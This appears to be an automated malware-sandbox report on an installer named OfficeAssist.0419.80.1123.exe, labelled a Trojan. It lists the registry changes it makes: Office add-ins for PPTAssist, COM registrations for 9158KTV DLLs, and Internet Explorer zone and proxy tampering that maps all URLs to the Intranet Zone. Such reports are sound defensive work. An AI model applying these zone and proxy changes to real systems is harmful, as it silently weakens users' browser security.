[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E A5 5E 95 45 54 1E 37 10 8B 3A 1F 7F B5 05 A7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Internet Explorer]
"iexplore.exe" = "Internet Explorer"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security-zone settings to map all local web nodes with no dots in the name that are not assigned to any other zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process OfficeAssist.0419.80.1123.exe:744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"DisplayName" = "PPT美化大师"
[HKCU\Software\PPTAssist\Common]
"infoGUID" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\PPTAssist\Common\Setting]
"HideExcelPane" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist]
"assistupdate.exe" = "PPT美化大师"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"Publisher" = "珠海金山办公软件有限公司"
[HKCU\Software\PPTAssist\Common]
"DistSrc" = "80.1123"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"LocationRoot" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"DisplayVersion" = "1.0.0.0419"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\pptassist\~21d1e5\install_res\1.png,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\PPTAssist\Common\Setting]
"HidePowerPntPane" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted\%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542]
"OfficeAssist.0419.80.1123.exe" = "1"
[HKCR\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\TypeLib]
"Version" = "2.5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe"
[HKCU\Software\PPTAssist\Common\Setting]
"HideWordPane" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 01 11 EA 39 04 7C C5 5F 78 10 78 B4 DA 80 18"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCR\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.5\HELPDIR]
"(Default)" = "%Program Files%\Common Files\Microsoft Shared\OFFICE14"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist]
"notify.exe" = "PPT Assist Expansion tool"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\PPTAssist\Common]
"Version" = "1.0.0.0419"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\TypeLib]
"(Default)" = "{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}"
The Trojan modifies the IE security-zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process OfficeAssist.0419.80.1123.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C AC 34 08 E8 A4 9C 69 66 D5 4C 77 7C D3 8D D2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process regsvr32.exe:2136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\ImageOle.GifAnimator.1]
"(Default)" = "GifAnimator Class"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
"(Default)" = "ImageOle.GifAnimator"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll, 102"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0]
"(Default)" = "ImageOle 1.0 Type Library"
[HKCR\ImageOle.GifAnimator\CurVer]
"(Default)" = "ImageOle.GifAnimator.1"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"Version" = "1.0"
[HKCR\ImageOle.GifAnimator]
"(Default)" = "GifAnimator Class"
[HKCR\ImageOle.GifAnimator\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}]
"(Default)" = "IGifAnimator"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 98 28 95 58 44 3E 4B C5 13 C2 2B D5 E1 01 09"
[HKCR\ImageOle.GifAnimator.1\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
"(Default)" = "ImageOle.GifAnimator.1"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
"(Default)" = "GifAnimator Class"
The process regsvr32.exe:2716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F AA 29 AE 0B B0 15 0B DB 79 47 BC 79 F8 93 9F"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
"ThreadingModel" = "Apartment"
[HKCR\WebVideo.ExeClient]
"(Default)" = "ExeClient Class"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0]
"(Default)" = "WebVideo 1.0 Type Library"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\WebVideo.ExeClient.1]
"(Default)" = "ExeClient Class"
[HKCR\WebVideo.ExeClient\CurVer]
"(Default)" = "WebVideo.ExeClient.1"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}]
"(Default)" = "ExeClient Class"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}]
"(Default)" = "IExeClient"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\VersionIndependentProgID]
"(Default)" = "WebVideo.ExeClient"
[HKCR\WebVideo.ExeClient\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\TypeLib]
"Version" = "1.0"
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\WebVideo.ExeClient.1\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\ProgID]
"(Default)" = "WebVideo.ExeClient.1"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\TypeLib]
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
The process regsvr32.exe:1280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\PPTAssist.Addins]
"(Default)" = "PPTAssist Class"
[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"LoadBehavior" = "3"
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"
[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Classes\PPTAssist.Addins\CLSID]
"(Default)" = "{034DF736-A378-4292-ACAE-A561088999F5}"
[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\Version]
"(Default)" = "1.0"
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"
[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"LoadBehavior" = "3"
[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll"
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\ProgID]
"(Default)" = "PPTAssist.Control.1"
[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist"
[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Classes\PPTAssist.Control.1\CLSID]
"(Default)" = "{1077138E-896C-445E-BD31-CFCFFA4636C4}"
[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll"
[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"CommandLineSafe" = "1"
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Classes\PPTAssist.Addins.1\CLSID]
"(Default)" = "{034DF736-A378-4292-ACAE-A561088999F5}"
[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"CommandLineSafe" = "1"
[HKCU\Software\Classes\PPTAssist.Control]
"(Default)" = "PPTAssistControl Class"
[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"
[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0]
"(Default)" = "PPTAssist 1.0 类型库"
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\VersionIndependentProgID]
"(Default)" = "PPTAssist.Addins"
[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"Description" = "PPT美化大师"
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\ProgID]
"(Default)" = "PPTAssist.Addins.1"
[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}]
"(Default)" = "IRibbonCallback"
[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"FriendlyName" = "PPT美化大师"
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll"
[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"LoadBehavior" = "3"
[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"Description" = "PPT美化大师"
[HKCU\Software\Classes\PPTAssist.Addins.1]
"(Default)" = "PPTAssist Class"
[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"Description" = "PPT美化大师"
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}]
"(Default)" = "PPTAssist Class"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 B1 53 ED 4F BB 45 4B EF 51 8F C1 FF E7 FE 4A"
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Classes\PPTAssist.Addins\CurVer]
"(Default)" = "PPTAssist.Addins.1"
[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}]
"(Default)" = "IWpsAssistControl"
[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}]
"(Default)" = "PPTAssistControl Class"
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\VersionIndependentProgID]
"(Default)" = "PPTAssist.Control"
[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"CommandLineSafe" = "1"
[HKCU\Software\Classes\PPTAssist.Control\CLSID]
"(Default)" = "{1077138E-896C-445E-BD31-CFCFFA4636C4}"
[HKCU\Software\Classes\PPTAssist.Control.1]
"(Default)" = "PPTAssistControl Class"
[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"FriendlyName" = "PPT美化大师"
[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"FriendlyName" = "PPT美化大师"
[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"
[HKCU\Software\Classes\PPTAssist.Control\CurVer]
"(Default)" = "PPTAssist.Control.1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\Programmable]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\ProgID]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\TypeLib]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\TypeLib]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\ProgID]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\Version]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\InprocServer32]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\InprocServer32]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\VersionIndependentProgID]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\VersionIndependentProgID]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\Programmable]
The process regsvr32.exe:2280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 7B 80 77 94 5C 96 B6 EE D3 E5 42 32 1B AB 6B"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"
[HKCR\Invoker9158.InvokeChat]
"(Default)" = "InvokeChat Class"
[HKCR\Invoker9158.InvokeChat.1]
"(Default)" = "InvokeChat Class"
[HKCR\Invoker9158.InvokeChat\CurVer]
"(Default)" = "Invoker9158.InvokeChat.1"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
"(Default)" = "Invoker9158.InvokeChat"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Invoker9158 1.0 Type Library"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Invoker9158.InvokeChat.1\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
"(Default)" = "Invoker9158.InvokeChat.1"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
"(Default)" = "InvokeChat Class"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IInvokeChat"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Invoker9158.InvokeChat\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"
The process regsvr32.exe:1124 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 47 31 82 39 D8 42 05 2E CC 33 5C 83 E4 5B 5E"
The process regsvr32.exe:2940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 39 52 96 CA 39 CA 61 B4 82 1A AA 2E 61 00 CF"
